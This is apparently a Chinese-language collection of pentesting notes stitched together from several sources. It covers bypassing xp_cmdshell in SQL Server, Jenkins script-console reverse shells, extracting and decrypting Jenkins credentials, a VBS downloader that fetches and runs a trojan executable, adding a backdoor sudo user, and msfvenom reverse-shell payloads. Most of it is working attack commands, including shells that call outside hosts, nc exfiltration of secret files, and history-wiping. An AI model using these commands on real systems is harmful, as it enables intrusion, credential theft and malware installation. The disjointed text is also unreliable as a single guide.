目标有360,绕过xp_cmdshell的方式
create table temp
(output varchar(8000));

;declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate ‘{72C24DD5-D70A-438B-8A42-98424B88AFB8}’,@luan output;exec sp_oamethod @luan,’exec’,@exec output,’C:\Windows\System32\ipconfig /all’;exec sp_oamethod @exec, ‘StdOut’, @text out;exec sp_oamethod @text, ‘readall’, @str out;select @str;insert into temp values(cast(@str as varchar(8000)));–

select * from temp;
drop table temp;

将其中payload换成wmic process call create “cmd /c whoami > C:\Users\vmware\a.t”注意这里的第二个路径一定要写有权限的绝对路径,否则环境是用的wmic路径,一般来说你没权限

2008R2下sqlserver权限试试ProgramData文件夹

转自http://www.rinige.com/index.php/archives/894/

入口

通常碰到 Jenkins 未授权并且拥有 Overall/RunScripts 权限时可以在 Script 控制台执行命令反弹 Shell:

println "wget http://www.rinige.com/back.py -P /tmp/".execute().text
println "python /tmp/back.py 192.168.1.3 8080".execute().text

back.py 里的 HISTFILE 会去掉各种 History 记录,且不需要 root 权限

或者使用 Groovy 脚本,这里使用的是 pentestmonkey 的 Java reverse shell:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/[attacker IP]/[port];cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

凭证提取

如果用户不是 root 没有 sudo 权限的情况下就可以通过提取 Jenkins 保存的用户或者其他节点凭证来获取 root 权限或者别的节点权限

jenkins_1.png

通常需要获取三个文件:master.keyhudson.util.Secret还有credentials.xml

这三个文件都在 Jenkins 安装目录,默认是/opt/jenkins

nc 传输文件:

root@jenkins:/opt/jenkins # nc -w3 192.168.1.3 5000 < credentials.xml
root@jenkins:/opt/jenkins/secrets # nc -w3 192.168.1.3 5000 < master.key
root@jenkins:/opt/jenkins/secrets # nc -w3 192.168.1.3 5000 < hudson.util.Secret

root@kali:~# nc -l -p 5000 > credentials.xml
root@kali:~# nc -l -p 5000 > master.key
root@kali:~# nc -l -p 5000 > hudson.util.Secret

Script 控制台获取credentials.xml文件:

Windows

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

*nix

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

文件内容示例:

credentials.xml

<?xml version =' 
1.0'encoding  ='UTF-8'?> <com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin = “credentials@1.9.4” > 
  <domainCredentialsMap  class = “hudson.util.CopyOnWriteMap $ Hash” > 
    <entry> 
      <com.cloudbees.plugins.credentials.domains.Domain> 
        <specifications /> 
      </com.cloudbees.plugins.credentials.domains.Domain> 
      <java.util.concurrent.CopyOnWriteArrayList> 
        <com.cloudbees.plugins .credentials.impl.UsernamePasswordCredentialsImpl> 
          <scope> GLOBAL </ scope> 
          <id> cd940f20-1697-4052-8b8b-e47c058b5390 </ id> 
          <description> </ description> 
          <username> admin</ username> 
          <password> VHWeSi8aTjIHIObYWyNw / 4hrqydpYESwI1JWfmBQNdI = </ password> 
        </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl> 
      </java.util.concurrent.CopyOnWriteArrayList> 
    </ entry> 
  </ domainCredentialsMap>

hudson.util.Secret

[root @ localhost secrets]#cat hudson.util.Secret | hexdump -C
00000000 de 03 88 1c 89 df 74 7a 3d f0 00 27 dc 9b e1 a3 | ...... tz = ..'.... |
00000010 e0 61 1d 99 30 31 91 95 e3 3b 2f 6d 8c a8 1f 4d | .a..01 ...; / m ... M |
00000020 38 b6 eb 20 13 27 38 e7 5b 93 09 e5 91 04 b8 53 | 8 .. .8。[...... S |
00000030 df 64 68 75 39 47 3a 2b 2a 17 69 64 ee bc 75 7b | .dhu9G:+ *。id..u {|
00000040 07 5f a1 e9 69 a2 d8 23 9f ad 6b 4d eb db 91 c5 | .. .. .. .. .. kM .... |
00000050 24 06 6b bc 3c d7 4f 16 e3 ab 95 19 72 f0 75 e7 | $ .k。<。O ..... ru |
00000060 c1 6c 2c 9d 0f 3f 06 99 4e 9f b4 50 12 44 91 1c | .l,..?.. N..PD。|
00000070 35 78 3c c3 cd 1a 2a 77 6e b5 90 4e 7d eb 3c f6 | 5x <... * wn..N}。<。|
00000080 fd c9 53 9e 6f 69 73 02 7b f8 dc 72 f2 60 12 cc | ..S.ois。{.. r.` .. |
00000090 ae df 4a 10 65 23 bb 34 36 db 7c 38 f0 a6 fc a3 | ..Je#.46。| 8 .... |
000000a0 24 d2 b6 a5 28 b9 58 f8 40 45 0f 83 39 5e da b4 | $ ...(。X. @ E..9 ^ .. |
000000b0 5d 93 f0 8f 33 06 bd af 47 b9 d0 b1 ec 26 39 ef |] ... 3 ... G ....&9. |
000000c0 53 25 6a d8 ce c6 ec a5 26 5b ee 85 20 df 63 4d | S%j .....&[.. .cM |
000000d0 f7 f4 94 33 c4 8e 3d 82 ad a9 45 4e be 3e dc 0e | ... 3 .. = ... EN。> .. |
000000e0 1e d9 49 47 36 3d 38 f3 eb 29 22 22 0c c9 b5 0a | ..IG6 = 8 ..)“”.... |
000000f0 68 a0 e4 0d 0d 5b 99 08 3f 4e 03 8a 70 78 7c a7 | h .... [..?N..px |。|
00000100 28 6a a7 93 8b 23 10 54 dd 49 6f f5 67 f4 9c 3c |(j ...#。T.Io.g .. <|
00000110
[root @ localhost secrets]#wc hudson.util.Secret 
  1 7 272 hudson.util.Secret

master.key

6fa18d9aaac920b016d119b76de75251f472ec6f44734533d64eeb5de794f1ca33108a7a7c853a3acf084184e3e93ff98484d668a32d16f810cce970f93c750da0b785cb25527384acab38015c1a3e180a342b807f724da01f3e94584ac60651dc7f1958f3e2c6ed1a16990cbbcc361c82e3b65e96f435173ea67b7255d6810f

解密

Jenkins 使用master.key来加密hudson.util.Secret密钥,hudson.util.Secret又用于加密credentials.xml中的密码。使用的加密算法为AES-128-ECB

1.Script 控制台执行:

println( hudson.util.Secret.decrypt("${ENCRYPTED_PASSPHRASE_OR_PASSWORD}") )

或者

hashed_pw='$PASSWORDHASH'
passwd = hudson.util.Secret.decrypt(hashed_pw)
println(passwd)

2.Python 脚本:

有国外的安全研究员公开了解密脚本:

https://github.com/tweksteen/jenkins-decrypt

https://gist.github.com/carnal0wnage/80611a9c035046b2d400d90303355ff0#file-decrypt-py

root@kali:~/jenkins-decrypt# python decrypt.py master.key hudson.util.Secret credentials.xml
  • Curl

http://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html

Windows:

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run

*nix

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"

获得 root 权限之后就可进行横向渗透等操作

参考

echo Set Post = CreateObject(“Msxml2.XMLHTTP”) >>zl.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >>zl.vbs
echo Post.Open “GET”,”http://www.jbzj.com/muma.exe”,0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject(“ADODB.Stream”) >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile “c:\zl.exe”,2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run (“c:\zl.exe”) >>zl.vbs

权限维持

添加用户,非交互式设置密码并加入sudo组
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
移动home目录:sudo usermod -d /path/to/new/home -m username

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST[“AAA”])){
echo “ISSET”;
}else{
echo “UNSET”;
}

这里要构造表单的
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

或者直接burp改,但是必须要Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘